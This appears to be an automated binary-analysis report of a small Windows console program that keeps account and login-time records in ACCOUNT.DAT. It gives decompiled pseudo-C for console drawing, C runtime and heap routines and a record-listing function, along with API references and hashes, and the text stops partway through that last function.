                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _swscanf.LIBCMT ref: 01233B48
                                                  • Part of subcall function 01237021: _vfscanf.LIBCMT ref: 01237035
                                                • _fprintf.LIBCMT ref: 01233DA6
                                                Strings
                                                • TEMP.DAT, xrefs: 01233AE2
                                                • ACCOUNT.DAT, xrefs: 01233ABE
                                                • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 01233B3D
                                                • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 01233D9A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: __fsopen_fprintf_swscanf_vfscanf
                                                • String ID: %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$ACCOUNT.DAT$TEMP.DAT
                                                • API String ID: 1563022539-2055742014
                                                • Opcode ID: 096a3f031dae880d0dca30786343e2b8a2f2da7bf0c031cd899281287a665c27
                                                • Instruction ID: 1e0091e21be034537487b3644022e42d3baa6bba919610de958e542c07569839
                                                • Opcode Fuzzy Hash: 096a3f031dae880d0dca30786343e2b8a2f2da7bf0c031cd899281287a665c27
                                                • Instruction Fuzzy Hash: 5491A672D105599FCB09DFA8E991BEDFBB9FF85300F04826EE006BA185E6745684CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 76%
                                                			E01231380(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				void* __ebp;
                                                				intOrPtr _t61;
                                                				intOrPtr _t67;
                                                				void* _t75;
                                                				intOrPtr _t87;
                                                				void* _t103;
                                                				void* _t104;
                                                				void* _t105;
                                                				void* _t106;
                                                
                                                				_t102 = __esi;
                                                				_t101 = __edi;
                                                				E012312B0(_a4, _a8);
                                                				_push(0xc9);
                                                				_push("%c");
                                                				E0123715C(_t75, __edi, __esi, __eflags);
                                                				_t104 = _t103 + 8;
                                                				_v8 = _a4 + 1;
                                                				while(1) {
                                                					_t109 = _v8 - _a12 - 1;
                                                					if(_v8 >= _a12 - 1) {
                                                						break;
                                                					}
                                                					E012312B0(_v8, _a8);
                                                					_push(0xcd);
                                                					_push("%c");
                                                					E0123715C(_t75, _t101, _t102, _t109);
                                                					_t104 = _t104 + 8;
                                                					_v8 = _v8 + 1;
                                                				}
                                                				E012312B0(_v8, _a8);
                                                				_push(0xbb);
                                                				_push("%c");
                                                				E0123715C(_t75, _t101, _t102, __eflags);
                                                				_t105 = _t104 + 8;
                                                				_v12 = _a8 + 1;
                                                				while(1) {
                                                					__eflags = _v12 - _a16;
                                                					if(__eflags >= 0) {
                                                						break;
                                                					}
                                                					E012312B0(_a4, _v12);
                                                					_v8 = _a4;
                                                					while(1) {
                                                						__eflags = _v8 - _a12;
                                                						if(_v8 >= _a12) {
                                                							break;
                                                						}
                                                						__eflags = _v8 - _a4;
                                                						if(__eflags == 0) {
                                                							L12:
                                                							E012312B0(_v8, _v12);
                                                							_push(0xba);
                                                							_push("%c");
                                                							E0123715C(_t75, _t101, _t102, __eflags);
                                                							_t105 = _t105 + 8;
                                                						} else {
                                                							__eflags = _v8 - _a12 - 1;
                                                							if(__eflags == 0) {
                                                								goto L12;
                                                							}
                                                						}
                                                						_t67 = _v8 + 1;
                                                						__eflags = _t67;
                                                						_v8 = _t67;
                                                					}
                                                					_t87 = _v12 + 1;
                                                					__eflags = _t87;
                                                					_v12 = _t87;
                                                				}
                                                				E012312B0(_a4, _v12);
                                                				_push(0xc8);
                                                				_push("%c");
                                                				E0123715C(_t75, _t101, _t102, __eflags);
                                                				_t106 = _t105 + 8;
                                                				_v8 = _a4 + 1;
                                                				while(1) {
                                                					__eflags = _v8 - _a12 - 1;
                                                					if(__eflags >= 0) {
                                                						break;
                                                					}
                                                					E012312B0(_v8, _v12);
                                                					_push(0xcd);
                                                					_push("%c");
                                                					E0123715C(_t75, _t101, _t102, __eflags);
                                                					_t106 = _t106 + 8;
                                                					_t61 = _v8 + 1;
                                                					__eflags = _t61;
                                                					_v8 = _t61;
                                                				}
                                                				E012312B0(_v8, _v12);
                                                				_push(0xbc);
                                                				_push("%c");
                                                				return E0123715C(_t75, _t101, _t102, __eflags);
                                                			}















                                                APIs
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 0123139D
                                                • _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 012313FC
                                                • _wprintf.LIBCMT ref: 01231470
                                                • _wprintf.LIBCMT ref: 01231493
                                                • _wprintf.LIBCMT ref: 012314D1
                                                • _wprintf.LIBCMT ref: 012314F2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                                • String ID:
                                                • API String ID: 1778593935-0
                                                • Opcode ID: d565dd80be8008ec78f8ceb4850a97238b3a12cb881bf5c464ebe02ef2e5c193
                                                • Instruction ID: 8c03bac9d8d8c861079f4183ec1c32dae2de8ece5af7cbee838b039b6d6bb4dd
                                                • Opcode Fuzzy Hash: d565dd80be8008ec78f8ceb4850a97238b3a12cb881bf5c464ebe02ef2e5c193
                                                • Instruction Fuzzy Hash: F84133F5A3420AFBCB04EFA8CD41EAE7775EFD5300F108159EA05AB340D670AB649B95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E0123D6D2(void* __ebx, void* __edi) {
                                                				void* __esi;
                                                				void* _t3;
                                                				intOrPtr _t6;
                                                				long _t14;
                                                				long* _t27;
                                                
                                                				E012375FE(_t3);
                                                				if(E0123BF8E() != 0) {
                                                					_t6 = E0123BFD8(_t5, E0123D468);
                                                					 *0x1251a40 = _t6;
                                                					__eflags = _t6 - 0xffffffff;
                                                					if(_t6 == 0xffffffff) {
                                                						goto L1;
                                                					} else {
                                                						_t27 = E0123C55B(1, 0x3b8);
                                                						__eflags = _t27;
                                                						if(_t27 == 0) {
                                                							L6:
                                                							E0123D748();
                                                							__eflags = 0;
                                                							return 0;
                                                						} else {
                                                							__eflags = E0123C002(_t9,  *0x1251a40, _t27);
                                                							if(__eflags == 0) {
                                                								goto L6;
                                                							} else {
                                                								_push(0);
                                                								_push(_t27);
                                                								E0123D626(__ebx, __edi, _t27, __eflags);
                                                								_t14 = GetCurrentThreadId();
                                                								_t27[1] = _t27[1] | 0xffffffff;
                                                								 *_t27 = _t14;
                                                								__eflags = 1;
                                                								return 1;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L1:
                                                					E0123D748();
                                                					return 0;
                                                				}
                                                			}









                                                APIs
                                                • __init_pointers.LIBCMT ref: 0123D6D2
                                                  • Part of subcall function 012375FE: EncodePointer.KERNEL32(00000000,?,0123D6D7,0123892B,0124D838,00000014), ref: 01237601
                                                  • Part of subcall function 012375FE: __initp_misc_winsig.LIBCMT ref: 01237622
                                                • __mtinitlocks.LIBCMT ref: 0123D6D7
                                                  • Part of subcall function 0123BF8E: InitializeCriticalSectionAndSpinCount.KERNEL32(012513D0,00000FA0,?,?,0123D6DC,0123892B,0124D838,00000014), ref: 0123BFAC
                                                • __mtterm.LIBCMT ref: 0123D6E0
                                                • __calloc_crt.LIBCMT ref: 0123D705
                                                • __initptd.LIBCMT ref: 0123D727
                                                • GetCurrentThreadId.KERNEL32 ref: 0123D72E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                • String ID:
                                                • API String ID: 2211675822-0
                                                • Opcode ID: 9295f8d04cf5905bfba25c83ee9590b70e321e08d59421d6f0bf874627e8c1c3
                                                • Instruction ID: 7980fe4ec559113fe8c3f0a295304233713501a1f50290607d484c6b11b841ea
                                                • Opcode Fuzzy Hash: 9295f8d04cf5905bfba25c83ee9590b70e321e08d59421d6f0bf874627e8c1c3
                                                • Instruction Fuzzy Hash: 91F0F6F25797571BE73A3ABC780676636D48BD1670B60061AF525D60C4EE20D0418594
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E0123BB6C(void* __eflags, signed char _a4, signed int* _a8) {
                                                				signed int _v8;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				void* _t43;
                                                				signed int _t44;
                                                				signed int _t45;
                                                				signed int _t48;
                                                				signed int _t52;
                                                				void* _t60;
                                                				signed int _t62;
                                                				void* _t64;
                                                				signed int _t67;
                                                				signed int _t70;
                                                				signed int _t74;
                                                				signed int _t76;
                                                				void* _t77;
                                                				signed int _t85;
                                                				void* _t86;
                                                				signed int _t87;
                                                				signed int _t89;
                                                				signed int* _t92;
                                                
                                                				_t44 = E0123A5A7(_t43);
                                                				if(_t44 >= 0) {
                                                					_t92 = _a8;
                                                					_t45 = E01238BB2(_t92);
                                                					_t74 = _t92[3];
                                                					_t89 = _t45;
                                                					__eflags = _t74 & 0x00000082;
                                                					if(__eflags != 0) {
                                                						__eflags = _t74 & 0x00000040;
                                                						if(__eflags == 0) {
                                                							_t70 = 0;
                                                							__eflags = _t74 & 0x00000001;
                                                							if((_t74 & 0x00000001) == 0) {
                                                								L10:
                                                								_t48 = _t92[3] & 0xffffffef | 0x00000002;
                                                								_t92[3] = _t48;
                                                								_t92[1] = _t70;
                                                								__eflags = _t48 & 0x0000010c;
                                                								if((_t48 & 0x0000010c) == 0) {
                                                									_t60 = E01238C70();
                                                									__eflags = _t92 - _t60 + 0x20;
                                                									if(_t92 == _t60 + 0x20) {
                                                										L13:
                                                										_t62 = E012411E7(_t89);
                                                										__eflags = _t62;
                                                										if(_t62 == 0) {
                                                											goto L14;
                                                										}
                                                									} else {
                                                										_t64 = E01238C70();
                                                										__eflags = _t92 - _t64 + 0x40;
                                                										if(_t92 != _t64 + 0x40) {
                                                											L14:
                                                											E0124192E(_t92);
                                                										} else {
                                                											goto L13;
                                                										}
                                                									}
                                                								}
                                                								__eflags = _t92[3] & 0x00000108;
                                                								if((_t92[3] & 0x00000108) == 0) {
                                                									__eflags = 1;
                                                									_push(1);
                                                									_v8 = 1;
                                                									_push( &_a4);
                                                									_push(_t89);
                                                									_t45 = E01240343(_t70, _t86, _t89, _t92, 1);
                                                									_t70 = _t45;
                                                									goto L27;
                                                								} else {
                                                									_t87 = _t92[2];
                                                									_t25 = _t87 + 1; // 0x1a06
                                                									 *_t92 = _t25;
                                                									_t76 =  *_t92 - _t87;
                                                									_v8 = _t76;
                                                									_t92[1] = _t92[6] - 1;
                                                									__eflags = _t76;
                                                									if(__eflags <= 0) {
                                                										__eflags = _t89 - 0xffffffff;
                                                										if(_t89 == 0xffffffff) {
                                                											L22:
                                                											_t77 = 0x1251390;
                                                										} else {
                                                											__eflags = _t89 - 0xfffffffe;
                                                											if(_t89 == 0xfffffffe) {
                                                												goto L22;
                                                											} else {
                                                												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x1252f60 + (_t89 >> 5) * 4));
                                                											}
                                                										}
                                                										__eflags =  *(_t77 + 4) & 0x00000020;
                                                										if(__eflags == 0) {
                                                											goto L25;
                                                										} else {
                                                											_push(2);
                                                											_push(_t70);
                                                											_push(_t70);
                                                											_push(_t89);
                                                											_t45 = E012417B4(_t70, _t89, _t92, __eflags) & _t87;
                                                											__eflags = _t45 - 0xffffffff;
                                                											if(_t45 == 0xffffffff) {
                                                												goto L28;
                                                											} else {
                                                												goto L25;
                                                											}
                                                										}
                                                									} else {
                                                										_push(_t76);
                                                										_push(_t87);
                                                										_push(_t89);
                                                										_t70 = E01240343(_t70, _t87, _t89, _t92, __eflags);
                                                										L25:
                                                										_t45 = _a4;
                                                										 *(_t92[2]) = _t45;
                                                										L27:
                                                										__eflags = _t70 - _v8;
                                                										if(_t70 == _v8) {
                                                											_t52 = _a4 & 0x000000ff;
                                                										} else {
                                                											L28:
                                                											_t40 =  &(_t92[3]);
                                                											 *_t40 = _t92[3] | 0x00000020;
                                                											__eflags =  *_t40;
                                                											goto L29;
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								_t92[1] = 0;
                                                								__eflags = _t74 & 0x00000010;
                                                								if((_t74 & 0x00000010) == 0) {
                                                									_t92[3] = _t74 | 0x00000020;
                                                									L29:
                                                									_t52 = _t45 | 0xffffffff;
                                                								} else {
                                                									_t85 = _t74 & 0xfffffffe;
                                                									__eflags = _t85;
                                                									 *_t92 = _t92[2];
                                                									_t92[3] = _t85;
                                                									goto L10;
                                                								}
                                                							}
                                                						} else {
                                                							_t67 = E01238EFF(__eflags);
                                                							 *_t67 = 0x22;
                                                							goto L6;
                                                						}
                                                					} else {
                                                						_t67 = E01238EFF(__eflags);
                                                						 *_t67 = 9;
                                                						L6:
                                                						_t92[3] = _t92[3] | 0x00000020;
                                                						_t52 = _t67 | 0xffffffff;
                                                					}
                                                					return _t52;
                                                				} else {
                                                					return _t44 | 0xffffffff;
                                                				}
                                                			}


























                                                0x0123bc7d
                                                0x0123bc7f
                                                0x0123bc80
                                                0x0123bc81
                                                0x0123bc87
                                                0x0123bc8c
                                                0x0123bc8f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0123bc8f
                                                0x0123bc3b
                                                0x0123bc3b
                                                0x0123bc3c
                                                0x0123bc3d
                                                0x0123bc46
                                                0x0123bc91
                                                0x0123bc94
                                                0x0123bc97
                                                0x0123bcb1
                                                0x0123bcb1
                                                0x0123bcb4
                                                0x0123bcbf
                                                0x0123bcb6
                                                0x0123bcb6
                                                0x0123bcb6
                                                0x0123bcb6
                                                0x0123bcb6
                                                0x00000000
                                                0x0123bcb6
                                                0x0123bcb4
                                                0x0123bc39
                                                0x0123bbc5
                                                0x0123bbc5
                                                0x0123bbc8
                                                0x0123bbcb
                                                0x0123bc4d
                                                0x0123bcba
                                                0x0123bcba
                                                0x0123bbcd
                                                0x0123bbd0
                                                0x0123bbd0
                                                0x0123bbd3
                                                0x0123bbd5
                                                0x00000000
                                                0x0123bbd5
                                                0x0123bbcb
                                                0x0123bba6
                                                0x0123bba6
                                                0x0123bbab
                                                0x00000000
                                                0x0123bbab
                                                0x0123bb94
                                                0x0123bb94
                                                0x0123bb99
                                                0x0123bbb1
                                                0x0123bbb1
                                                0x0123bbb5
                                                0x0123bbb5
                                                0x0123bcc7
                                                0x0123bb79
                                                0x0123bb7d
                                                0x0123bb7d

                                                APIs
                                                • __ioinit.LIBCMT ref: 0123BB70
                                                  • Part of subcall function 0123A5A7: InitOnceExecuteOnce.KERNEL32(0125229C,0123A5E2,00000000,00000000,01241205,?,?,01239886,00000000,?,?,?,012371AD,-00000020,0124D7B8,0000000C), ref: 0123A5B5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Once$ExecuteInit__ioinit
                                                • String ID:
                                                • API String ID: 129814473-0
                                                • Opcode ID: a3723833a784d0035029f83ddb1f748b61901b88de0fd0e471294b3ec6791ab2
                                                • Instruction ID: 5002ab42a2ee48422dd7b6de1c71efbd61ffdde899e9908cdbb34c2abc2d7ea0
                                                • Opcode Fuzzy Hash: a3723833a784d0035029f83ddb1f748b61901b88de0fd0e471294b3ec6791ab2
                                                • Instruction Fuzzy Hash: E141F5F16307029FE7399F2CC891A7A7BA49FD5320B048B1DE6A6876D1EB74D4408B50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E01241D26(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                				void* _t7;
                                                				long _t8;
                                                				intOrPtr* _t9;
                                                				intOrPtr* _t12;
                                                				long _t20;
                                                				long _t31;
                                                
                                                				if(_a4 != 0) {
                                                					_t31 = _a8;
                                                					__eflags = _t31;
                                                					if(_t31 != 0) {
                                                						_push(__ebx);
                                                						while(1) {
                                                							__eflags = _t31 - 0xffffffe0;
                                                							if(_t31 > 0xffffffe0) {
                                                								break;
                                                							}
                                                							__eflags = _t31;
                                                							if(_t31 == 0) {
                                                								_t31 = _t31 + 1;
                                                								__eflags = _t31;
                                                							}
                                                							_t7 = HeapReAlloc( *0x1252a68, 0, _a4, _t31);
                                                							_t20 = _t7;
                                                							__eflags = _t20;
                                                							if(_t20 != 0) {
                                                								L17:
                                                								_t8 = _t20;
                                                							} else {
                                                								__eflags =  *0x1252a64 - _t7;
                                                								if(__eflags == 0) {
                                                									_t9 = E01238EFF(__eflags);
                                                									 *_t9 = E01238F12(GetLastError());
                                                									goto L17;
                                                								} else {
                                                									__eflags = E0123C6EE(_t7, _t31);
                                                									if(__eflags == 0) {
                                                										_t12 = E01238EFF(__eflags);
                                                										 *_t12 = E01238F12(GetLastError());
                                                										L12:
                                                										_t8 = 0;
                                                										__eflags = 0;
                                                									} else {
                                                										continue;
                                                									}
                                                								}
                                                							}
                                                							goto L14;
                                                						}
                                                						E0123C6EE(_t6, _t31);
                                                						 *((intOrPtr*)(E01238EFF(__eflags))) = 0xc;
                                                						goto L12;
                                                					} else {
                                                						E01238F53(_a4);
                                                						_t8 = 0;
                                                					}
                                                					L14:
                                                					return _t8;
                                                				} else {
                                                					return E012377C5(__ebx, __edx, __edi, _a8);
                                                				}
                                                			}










                                                APIs
                                                • _malloc.LIBCMT ref: 01241D32
                                                  • Part of subcall function 012377C5: __FF_MSGBANNER.LIBCMT ref: 012377DC
                                                  • Part of subcall function 012377C5: __NMSG_WRITE.LIBCMT ref: 012377E3
                                                  • Part of subcall function 012377C5: HeapAlloc.KERNEL32(00A50000,00000000,00000001,00000000,00000000,00000000,?,0123C5BB,00000000,00000000,00000000,00000000,?,0123BF28,00000018,0124D900), ref: 01237808
                                                • _free.LIBCMT ref: 01241D45
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: AllocHeap_free_malloc
                                                • String ID:
                                                • API String ID: 2734353464-0
                                                • Opcode ID: ccd8d4a5751def43bb8f633174a4947b5e6fe562f416e8501ce2be29bf67c11a
                                                • Instruction ID: b533630e41595dafc76d5075909c6c6ece6ac824fed1725904b7007a5323c064
                                                • Opcode Fuzzy Hash: ccd8d4a5751def43bb8f633174a4947b5e6fe562f416e8501ce2be29bf67c11a
                                                • Instruction Fuzzy Hash: 9C11C6F2534313EFDB393FB8A8046793B999F50260F104525FA89DA194DF34E4E09794
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 0123860D
                                                  • Part of subcall function 0123E840: __87except.LIBCMT ref: 0123E87B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: ErrorHandling__87except__start
                                                • String ID: pow
                                                • API String ID: 2905807303-2276729525
                                                • Opcode ID: 94d0458ce56f14d9088ef7cda2fbcca6fd90b181e8a223b371e88f0592ba9811
                                                • Instruction ID: 619fe3fc2942727e06a91cd8c2fe1a6dcd52868b57d6946b70352e4a71a8e7f7
                                                • Opcode Fuzzy Hash: 94d0458ce56f14d9088ef7cda2fbcca6fd90b181e8a223b371e88f0592ba9811
                                                • Instruction Fuzzy Hash: 53516BE0A39203CADB127B1CD94137E2F94EBC0710F118E69F2D54A2EDEB75C4989B46
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E0123347B(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                				intOrPtr _t218;
                                                				void* _t228;
                                                				void* _t249;
                                                				void* _t270;
                                                				void* _t283;
                                                				void* _t287;
                                                				void* _t306;
                                                				intOrPtr _t307;
                                                				void* _t309;
                                                				intOrPtr _t310;
                                                				void* _t313;
                                                				void* _t314;
                                                				intOrPtr _t320;
                                                				void* _t336;
                                                				intOrPtr _t364;
                                                				void* _t371;
                                                				intOrPtr _t394;
                                                				void* _t397;
                                                				void* _t421;
                                                				void* _t433;
                                                				void* _t435;
                                                				void* _t436;
                                                				void* _t437;
                                                				void* _t442;
                                                				void* _t443;
                                                				void* _t446;
                                                				void* _t448;
                                                				void* _t450;
                                                				void* _t451;
                                                				void* _t457;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					_t457 = __fp0;
                                                					_t421 = __esi;
                                                					_t397 = __edi;
                                                					_t314 = __ebx;
                                                					 *(_t433 - 8) = 1 +  *(_t433 - 8);
                                                					 *(_t433 - 0xc) = 1 +  *(_t433 - 0xc);
                                                					while(1) {
                                                						L69:
                                                						__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                						if(__eflags < 0) {
                                                						}
                                                						L70:
                                                						E012312B0(5,  *(_t433 - 0xc) + 0xa);
                                                						_push(1 +  *(_t433 - 8));
                                                						_push("%d.");
                                                						E0123715C(_t314, _t397, _t421, __eflags);
                                                						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x36)) = 0;
                                                						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x40)) = 0;
                                                						_t181 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
                                                						_t270 = E012382C0( *((intOrPtr*)(_t433 - 0x10)) + _t181);
                                                						_t448 = _t435 + 0xc;
                                                						__eflags = _t270 - 0xa;
                                                						if(__eflags < 0) {
                                                							_t336 =  *(_t433 - 8) * 0x45;
                                                							__eflags = _t336;
                                                							_t185 = _t336 + 0x22; // 0x23
                                                							_push( *((intOrPtr*)(_t433 - 0x10)) + _t185);
                                                							E012316A0(_t397, _t421, _t457);
                                                						}
                                                						L72:
                                                						E012312B0(9,  *(_t433 - 0xc) + 0xa);
                                                						_t190 = 0x3b +  *(_t433 - 8) * 0x45; // 0x3c
                                                						_push( *((intOrPtr*)(_t433 - 0x10)) + _t190);
                                                						_t194 = 0x31 +  *(_t433 - 8) * 0x45; // 0x32
                                                						_push( *((intOrPtr*)(_t433 - 0x10)) + _t194);
                                                						_t198 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
                                                						_push( *((intOrPtr*)(_t433 - 0x10)) + _t198);
                                                						_t202 = 4 +  *(_t433 - 8) * 0x45; // 0x5
                                                						_push( *((intOrPtr*)(_t433 - 0x10)) + _t202);
                                                						_push("%s\t\t%s\t%s\t\t%s");
                                                						E0123715C(_t314, _t397, _t421, __eflags);
                                                						_t435 = _t448 + 0x14;
                                                						__eflags =  *(_t433 - 8) -  *(_t433 - 0x1c) + 9;
                                                						if( *(_t433 - 8) <  *(_t433 - 0x1c) + 9) {
                                                							L74:
                                                							goto L0;
                                                						} else {
                                                							L73:
                                                							 *(_t433 - 0x1c) =  *(_t433 - 0x1c) + 0xa;
                                                						}
                                                						L75:
                                                						_t322 =  *((char*)(_t433 - 1));
                                                						__eflags =  *((char*)(_t433 - 1)) - 0x53;
                                                						if( *((char*)(_t433 - 1)) == 0x53) {
                                                							L77:
                                                							 *(_t433 - 0x34) = 1;
                                                						} else {
                                                							L76:
                                                							__eflags =  *((char*)(_t433 - 1)) - 0x73;
                                                							if( *((char*)(_t433 - 1)) == 0x73) {
                                                								goto L77;
                                                							}
                                                						}
                                                						L78:
                                                						__eflags =  *((char*)(_t433 - 1)) - 0x20;
                                                						if( *((char*)(_t433 - 1)) == 0x20) {
                                                							_t322 =  *(_t433 - 8);
                                                							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                							if( *(_t433 - 8) ==  *(_t433 - 0x14)) {
                                                								 *(_t433 - 0x1c) = 0;
                                                							}
                                                						}
                                                						L81:
                                                						__eflags =  *((char*)(_t433 - 1)) - 0x53;
                                                						if(__eflags == 0) {
                                                							L50:
                                                							E012320E0(_t322, _t397, _t421, __eflags, _t457);
                                                							__eflags =  *(_t433 - 0x14) - 0xc;
                                                							if(__eflags >= 0) {
                                                								E012312B0(0xf, 0x15);
                                                								_push("Press SPACE BAR to view more data");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t446 = _t435 + 4;
                                                							} else {
                                                								E012312B0(8, 0x15);
                                                								_push("Press S to toggle Sorting between ascending or descending order.");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t446 = _t435 + 4;
                                                							}
                                                							L53:
                                                							E012312B0(5, 8);
                                                							_push("SN\t User Name\tDate\t\tStart time\tEnd Time");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							_t435 = _t446 + 4;
                                                							E012312B0(4, 9);
                                                							 *(_t433 - 8) = 0;
                                                							while(1) {
                                                								L55:
                                                								__eflags =  *(_t433 - 8) - 0x46;
                                                								if(__eflags >= 0) {
                                                									break;
                                                								}
                                                								L56:
                                                								_push(0xc4);
                                                								_push("%c");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t435 = _t435 + 8;
                                                								L54:
                                                								_t287 = 1 +  *(_t433 - 8);
                                                								__eflags = _t287;
                                                								 *(_t433 - 8) = _t287;
                                                							}
                                                							L57:
                                                							__eflags =  *(_t433 - 0x34);
                                                							if( *(_t433 - 0x34) != 0) {
                                                								L58:
                                                								 *(_t433 - 8) =  *(_t433 - 0x14) - 1;
                                                								while(1) {
                                                									L60:
                                                									__eflags =  *(_t433 - 8);
                                                									if( *(_t433 - 8) < 0) {
                                                										break;
                                                									}
                                                									L61:
                                                									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
                                                									memcpy(( *(_t433 - 0x14) -  *(_t433 - 8) - 1) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
                                                									_t435 = _t435 + 0xc;
                                                									_t397 = _t421 + 0x22;
                                                									asm("movsb");
                                                									L59:
                                                									_t371 =  *(_t433 - 8) - 1;
                                                									__eflags = _t371;
                                                									 *(_t433 - 8) = _t371;
                                                								}
                                                								L62:
                                                								 *(_t433 - 8) = 0;
                                                								while(1) {
                                                									L64:
                                                									__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                									if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
                                                										goto L66;
                                                									}
                                                									L65:
                                                									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
